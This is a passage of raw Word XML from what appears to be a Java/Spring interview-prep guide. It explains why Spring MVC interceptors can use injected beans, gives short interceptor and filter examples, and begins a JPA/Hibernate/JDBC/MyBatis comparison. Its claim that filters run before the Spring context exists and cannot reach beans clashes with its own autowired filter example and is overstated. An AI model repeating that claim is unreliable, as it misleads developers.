    <w:p w14:paraId="783997C1" w14:textId="69E386A1" w:rsidR="006164D4" w:rsidRPr="00CE4B95" w:rsidRDefault="008467E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="448" w:name="_Toc196307928"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which one has access to spring beans, interceptors or filters</w:t>
      </w:r>
      <w:r w:rsidR="006164D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="448"/>
    </w:p>
    <w:p w14:paraId="3CACEAFE" w14:textId="00019B66" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734" w:rsidP="00452C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> have access to Spring beans, whereas </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> do not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BFF0C2" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E841E30" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1916"/>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Interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are part of the Spring MVC framework and operate at the controller level, which means they are part of the Spring application context. Since they are Spring-managed components, they have access to all Spring beans that are configured within the application context. You can inject Spring beans into interceptors and use them during the request handling process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D86FDDD" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you need to use a service or repository inside an interceptor, you can inject it via constructor injection or field injection, just like any other Spring bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC5ECD1" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1AC620" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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lastRenderedPageBreak/>
        <w:t>public class MyInterceptor implements HandlerInterceptor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602F75F1" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC80DC" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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private MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B783764" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF1A508" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A551C77" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31E51C" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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 You can use myService here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F41E2" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF455C" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42148E1F" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D21D7" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1916"/>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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, on the other hand, are part of the Servlet API, and they are not managed by the Spring container. Filters operate before the request reaches the Spring DispatcherServlet (before the Spring context is initialized), so they do not have direct access to Spring beans. Filters only interact with the ServletRequest and ServletResponse objects and perform their tasks before the request is processed by the Spring application context. To use Spring beans in filters, you would need to manually obtain the ApplicationContext or configure it in a different way, which is less common and not recommended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C280223" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you need to use Spring beans inside a filter, you can manually obtain the Spring context, but this approach is less elegant and not the recommended way to use Spring beans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E6A1B3" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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public class MyFilter implements Filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD63794" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F03CD" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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private MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1C3E9" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2425A5D3" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535763DF" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9F4225" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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 Access to Spring beans is not directly available here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB96101" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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 You would need to use something like SpringContextUtils to get the context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB3BDB" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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chain.doFilter(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C407E4" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F8CAC" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7469F6" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19120D83" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1917"/>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Interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> have direct access to Spring beans because they are part of the Spring MVC lifecycle and are Spring-managed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649D19E7" w14:textId="77777777" w:rsidR="00091734" w:rsidRPr="00452C19" w:rsidRDefault="00091734" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1917"/>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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> do not have direct access to Spring beans because they operate before the Spring application context is initialized and are part of the Servlet container. To access Spring beans in filters, you need to manually configure it, which is not the standard practice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E7F56E" w14:textId="237524FD" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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5FAD975">
          <v:rect id="_x0000_i2123" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97A66A" w14:textId="07B3255F" w:rsidR="006164D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00E926D5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="_Toc196307929"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why do interceptors have access to Spring beans</w:t>
      </w:r>
      <w:r w:rsidR="006164D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="449"/>
    </w:p>
    <w:p w14:paraId="20769D4B" w14:textId="74811E46" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Interceptors have access to Spring beans because they are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and are managed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring container</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Let's break this down to understand why this is the case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D01BE" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3"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1. Spring-managed Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B8920B" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1918"/>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Interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are Spring beans themselves and, as such, are managed by the Spring IoC (Inversion of Control) container. This means that Spring is responsible for their creation, lifecycle management, and dependency injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC7766E" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1918"/>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Since Spring beans are automatically registered and managed within the Spring application context, interceptors (which are also Spring beans) can be injected with other Spring beans, such as services, repositories, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61173569" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3"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2. Integration with Spring MVC Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268DE67" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1919"/>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Interceptors are integrated into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC request handling process</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. When a request is processed by the DispatcherServlet, Spring interceptors can act on that request before and after the controller method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28E66B" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1919"/>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This integration allows interceptors to hook into the request/response lifecycle, just like controllers or other Spring-managed components. During this lifecycle, Spring injects dependencies into interceptors in the same way it does for other beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C57E8" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3"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lastRenderedPageBreak/>
        <w:t>3. Spring Bean Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22655299" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1920"/>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Since interceptors are Spring beans, they are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Bean lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means that Spring manages the instantiation of interceptors, and dependency injection occurs just as it does for other beans in the Spring context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E7FF7" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1920"/>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The ApplicationContext provides the container for all Spring beans, including interceptors. Spring resolves dependencies automatically by performing autowiring or using constructor-based injection when configuring interceptors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411FEC0A" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3"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4. Why Filters Don’t Have Access to Spring Beans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AF1626" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1921"/>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In contrast to interceptors, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet API</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and operate at a lower level. Filters are not part of the Spring container and are not managed by the Spring IoC container. They are invoked before the request reaches the DispatcherServlet, so they are unaware of the Spring context and its beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F17377" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1921"/>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Filters are created by the servlet container (like Tomcat), not by Spring, and they do not have access to Spring’s dependency injection mechanism unless explicitly configured to do so (using manual context lookups, which is not the typical approach).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E776E5" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3"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Summary of Why Interceptors Have Access to Spring Beans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC90C41" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1922"/>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Interceptors are Spring-managed beans</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning they are created, configured, and managed by the Spring IoC container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E7E405" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1922"/>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Since they are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, they can utilize the dependency injection system (like autowiring) to get access to other Spring beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58235574" w14:textId="77777777" w:rsidR="006910A3" w:rsidRPr="00452C19" w:rsidRDefault="006910A3" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1922"/>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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, in contrast, are not managed by Spring and do not have direct access to Spring beans unless explicitly configured, making interceptors the natural choice for using Spring-managed beans in the request/response lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019972A8" w14:textId="4A5F507A" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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E793126">
          <v:rect id="_x0000_i2124" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34338CAD" w14:textId="5A54D251" w:rsidR="006164D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00F618CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="450" w:name="_Toc196307930"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Spring data JPA, Hibernate, JDBC, My batis</w:t>
      </w:r>
      <w:r w:rsidR="006164D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
    </w:p>
    <w:p w14:paraId="7D6A99E4" w14:textId="05590E48" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Here’s a comparison of </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
